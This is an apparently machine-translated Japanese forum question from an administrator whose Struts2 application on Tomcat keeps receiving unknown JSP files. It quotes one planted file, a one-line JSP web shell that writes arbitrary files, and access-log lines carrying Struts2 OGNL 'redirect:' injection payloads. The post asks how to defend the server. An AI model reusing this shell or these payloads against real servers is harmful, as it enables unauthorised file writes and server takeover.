tomcat 7x と Apache 2.2 を tomcat の前面に配置して、パブリック ドメインで struts2 アプリをホストしようとしました。
Web アプリ フォルダーで悪意のあるアクティビティが見られます。
indcx.jsp、maneger.jsp、uplod.jsp などのいくつかのファイルと、そのような多くの不明なファイルが tomcat/webapp/application フォルダーにアップロードされるのを見るたびに。
私は毎回これらのファイルを手動で削除していますが、そのような悪意のある/ハッカーの活動やそのような未知のファイルのアップロードを回避できる設定または構成があるかどうかを知りたい.
編集
そのようなファイルをもう一度見ましたが、ファイルの内容は次のとおりです
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
私の質問は、誰かがこのファイルを私のサーバーにアップロードするにはどうすればよいですか?
再編集
綿密な分析の結果、これは struts2 または xwork のセキュリティの問題または脆弱性であることがわかりました。残りのストーリーのほとんどを示すすべてのログを次に示します。
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74